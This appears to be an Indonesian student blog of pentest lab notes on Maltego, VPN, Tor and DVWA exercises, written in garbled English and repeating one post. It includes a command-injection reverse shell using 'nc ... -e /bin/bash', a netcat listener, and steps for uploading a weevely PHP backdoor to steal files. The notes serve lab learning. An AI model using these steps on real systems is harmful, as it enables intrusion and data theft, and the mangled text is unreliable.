Minggu, 23 Agustus 2015

MELTAGO




 Maltego is a program that can be used to determine the relationship between the information domain, DNS name, IP address and so on.



open
~> menu pentest >> >> >> All >> Gathering information Maltego CE
after that then there told Online registration.





 









we click on the top panel truz >> New [ato key Ctrl + t]


we click on the top panel truz >> New [ato key Ctrl + t]


if you've like it then we see that in addition to the display panel.

and drag the dominant writing atou the others to the center:


fter victim has been determined then we start scanning it:
by right clicking >> All Transforms
 




VPN VIRTUAL PRIPAT NETWORK

VPN or Virtual Private Network is a connection between one network to another network in private over the public network (Internet). VPNs are called Virtual network because it uses a public network (Internet) as a media intermediary alias instead of a direct connection. And called Private Network
because the network is private, where only certain people can access it. Transmitted data was encrypted so safe and kept confidential even though sent over a public network.

 https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic8dV9tImLGLtvyUgUpv5k56Lcnq7gtSpGqPJAJuFOwkykoMlw-niDjNpFJOUMwQ8vVnlLiRnnO05A9YjW45w0mwhOuuRlsRB9OPlSEFFUWBkM8YS6puUu3K-LeSH9hq7fncpDxmzxWzw/s1600/Pengertian+VPN+(Virtual%2BPrivate%2BNetwork)%2B-%2BTransiskom.png

2 How it works and VPN functions are:

   -  VPN supports multiple protocols such as PPTP, L2TP, IPSec and SOCKS. This protocol helps to process the workings VPN authentication.
 
    - VPN client can establish a connection and identify people who were wewenangan in the network.
 
     -Encrypted VPN network also will improve security features. it also means that a VPN is usually not seen in a larger network.
 
    
     The current technology is increasingly basing the development of VPN because mobility is provided and is currently Virtual Private Network also pave the way for a WiFi connection and private wireless networks.

TOR The Onion Router

1.Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. It also allows software developers to create new communication tools with built-in privacy features. Tor provides the foundation for a range of applications that allow organizations and individuals to share information over public networks without compromising their privacy.



2 tor will protect you from the search ato you can hide all things related to the problem you .karna pripasi tor network would be difficult to trace the people who will take advantage of gaps in your network









Sabtu, 22 Agustus 2015

METASPLOITEBEL

1. Open aeperti dvwa display at the terminal.
then enter the browser.
input http: // localhoset / dvwa /

2. select menu upload
 3. Then open it in a virtual  box METASPLOIT which we assume as the target, but the first ping is already connected to the network is ours atow yet open in terminal
4. Once connected to the network convinced us then find a gap to put the door back on target
5 Then check again whether the door that we put existing atow yet
  then we check whether the door behind which we put already ato yet
6 after the lanjuta to the next step back to DVWA and select upload and file that we uploada is a back door that had we put that in the home folder
7 further after the upload, the select list under the red begambar the block of writing hackable to php
8 list in the block then copied up to the brouser
9. after the copy in column brouser then to check incoming files ato not then enter in the url brouser white screen when the BD file our reply pairs have masuk..lanjut step berikunyah .
10.masuk terminal and typing the URL in the copies that we had at the back end password (weevly http: // ip // targets hackadle / upload / tynp.p
11 after entering the next step is live we see that we install directory bekdor
 
 12.we live next target computer control
13Hereinafter we have entered in the target directory we take her files that exist on the target computer
14 berikunya step is donload file in python when using linux parrot donload first format the name that we take
15 The next step along the target ip address input port that we had already setting when we put the back door
16 The next open a terminal that was used earlier as atteker and it will automatically ter donload directory file we want.
17 then copy the file which we had already post

 18  the last step then we can go

 


Jumat, 21 Agustus 2015

DVWA UPLOAD BEK DOR

1. Open aeperti dvwa display at the terminal.
then enter the browser.
input http: // localhoset / dvwa /
2. select menu upload
 3. Then open it in a virtual linux box which we assume as the target, but the first ping is already connected to the network is ours atow yet open in terminal

4. Once connected to the network convinced us then find a gap to put the door back on target

5 Then check again whether the door that we put existing atow yet
  then we check whether the door behind which we put already ato yet
6 after the lanjuta to the next step back to DVWA and select upload and file that we uploada is a back door that had we put that in the home folder
7 further after the upload, the select list under the red begambar the block of writing hackable to php
8 list in the block then copied up to the brouser
9. after the copy in column brouser then to check incoming files ato not then enter in the url brouser white screen when the BD file our reply pairs have masuk..lanjut step berikunyah .
10.masuk terminal and typing the URL in the copies that we had at the back end password (weevly http: // ip // targets hackadle / upload / tynp.p
11 after entering the next step is live we see that we install directory bekdor
 12.we live next target computer control

13Hereinafter we have entered in the target directory we take her files that exist on the target computer
14 berikunya step is donload file in python when using linux parrot donload first format the name that we take
15 The next step along the target ip address input port that we had already setting when we put the back door
16 The next open a terminal that was used earlier as atteker and it will automatically ter donload directory file we want.
17 capture files in the target directory is complete

Kamis, 20 Agustus 2015

CSRF

Sign in to DVWA

select CSRF

  then input the password change User name




INPUT USER NAME
THEN CHANGE PASSWORD

COMMAND EXECUTION


- Log in early halama DVWA.
 

- Choose the comman execution

 
 - Enter the IP attaker


- Put ip Target

- Ateker type in terminal #nc -lvp (corresponding input port) and then enter



-Masukan Back ip Target

-Command Execution on the target web url ip target / dvwa / localhost; nc ip itself (the port that d choose) -e / bin / bash

-masuk to the terminal to see already masu atow not type in LS